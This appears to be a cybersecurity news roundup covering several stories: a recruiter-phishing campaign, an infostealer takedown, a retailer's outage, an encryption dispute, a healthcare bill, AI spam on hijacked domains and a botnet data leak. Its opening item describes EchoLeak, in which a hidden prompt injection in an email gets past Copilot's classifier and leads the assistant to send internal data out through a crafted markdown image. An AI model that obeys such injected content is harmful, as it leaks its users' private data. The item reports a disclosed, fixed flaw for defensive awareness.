In today’s cybersecurity news…
Zero-click data leak flaw in Copilot
Researchers at Aim Labs documented a flaw in Microsoft 365 Copilot dubbed EchoLeak, part of an emerging class of “LLM Scope Violation” vulnerabilities. By sending an email with a hidden prompt injection in an otherwise banal business email, the researchers could get around Microsoft’s cross-prompt injection attack classifier protections. When a user later asks about the email, the Retrieval-Augmented Generation, or RAG engine, pulls in the malicious injection, inserting internal data into a crafted markdown image and sending it to a third-party server. Aim Labs reported the issue to Microsoft back in January, which subsequently issued a server-side fix in May.
Operation Secure targets infostealer operations
Interpol announced the results of Operation Secure, an international law enforcement effort that targeted infostealer infrastructure across 26 countries. The operation ran from January through April 2025, resulting in the takedown of over 20,000 malicious IP addresses, seizing 2,300 domains associated with malware-as-a-service operations, 32 arrested suspects, and notification to 216,000 total victims. Lumma, RisePro, and the META Stealer all had their infrastructure impacted by the operation. Private cybersecurity partners, including Kaspersky, Group-IB, and Trend Micro, also aided in the operation.
(The Record, Bleeping Computer)
FIN6 targets recruiters
A new report from DomainTools found that the long-running FIN6 cybercrime group has been operating a campaign posting job applicants on LinkedIn and Indeed to target recruiters. The campaign sees them slowly initiating conversations on various job-posting platforms to gain trust. This is followed by a phishing email without clickable links, spurring the victim to manually enter a URL to send them to a fake resume site hosted on a legitimate cloud provider. These pages verify the victim before delivering a zip file that installs the MoreEggs backdoor. From there, the threat actors steal credentials and deploy ransomware.
United Natural Foods recovery plan
Earlier this week we shared the report that United Natural Foods shut down all business systems from ordering to selection and shipping due to a cyberattack. On its earnings call, CEO Sandy Douglas said the company now says it expects to bring systems back online by June 15th, ten days after the attack was discovered on June 5, 2025. Bloomberg’s sources say the disruption isn’t anticipated to impact the company’s payroll processing, but that some worker shifts have been cancelled due to shuttered operations, even as managers cannot call staff to tell them not to come in. Anecdotal evidence shows some Whole Foods impacted by this outage, with significantly empty shelves on some items. (Bloomberg)
Huge thanks to our sponsor, Vanta
With Vanta, GRC can be so. much. easier—while also strengthening your security posture and driving revenue for your business. Vanta automates key areas of your GRC program—including compliance, risk, and customer trust—and streamlines the way you manage information.
The impact is real: A recent IDC analysis found that compliance teams using Vanta are one hundred and twenty nine percent more productive.
Get back time to focus on strengthening security and scaling your business. Get started at Vanta.com/headlines.
WhatsApp to back Apple in dispute with UK Home Office
Back in March, Apple filed an appeal to the UK’s Investigatory Powers Tribunal, after receiving a secret order from the Home Office to pass on encrypted data from users in the event of a national security threat. You may recall Apple decided to remove its Advanced Data Protection feature in the UK over this dispute. There’s not a lot of love lost between Apple and Meta, which makes it notable that WhatsApp head Will Cathcart said the company applied to submit evidence to the court in support of Apple’s appeal. Cathcart noted the messaging giant “would challenge any law or government request that seeks to weaken the encryption of our services.”
(BBC)
Bill seeks to strengthen healthcare security
Congressman Jason Crow introduced the bipartisan Healthcare Cybersecurity Bill to Congress. If passed, the bill would require CISA and the US Department of Health and Human Services to work together on measure to improve cybersecurity across the sector, including share of threat intelligence, CISA-provided training to healthcare orgs, the creation of healthcare risk management plan with best practices, and creating an objective basis for determining high risk assets. This follows plans to update HIPAA Security Rules announced back in January, which require additional security measures for protected health information.
AI-slop spam campaign hits abandoned sites
404 Media reports that domains owned by prominent companies and organizations, including Nvidia, Stanford, NPR, and the U.S. Department of Health and Human Services’ vaccines.gov, were seemingly infiltrated by a spam marketing campaign. These sites hosted thousands of AI-generated articles each, ranging from travel guides to video game reviews, and the absurdly lewd. Most of these domains were no longer active, like NPR’s “Generation Listen” project from 2014. All sites carried a byline of “Ashley” on articles, with the same Disclaimer, DMCA, Privacy Policy and Terms of Use pages. Clicking through any links on the sites goes to an SEO spam page. Based on site archives, some domains were hijacked for over a month.
DanaBot leaked data for 3 years
Last month, we covered that an international law enforcement effort disrupted the DanaBot botnet, a malware-as-a-service platform operating since 2018. Following the takedown, security researchers at Zscaler discovered that a flaw in DanaBot’s C2 servers caused a memory leak from June 2022 to early 2025. Dubbed DanaBleed, the flaw leaked up to 1,792 arbitrary bytes per server response. Researchers obtained victim data, usernames, IP addresses, malware version updates, and private cryptographic keys. It remains unclear if this disruption effort and leaked data will lead to a permanent takedown of the operation.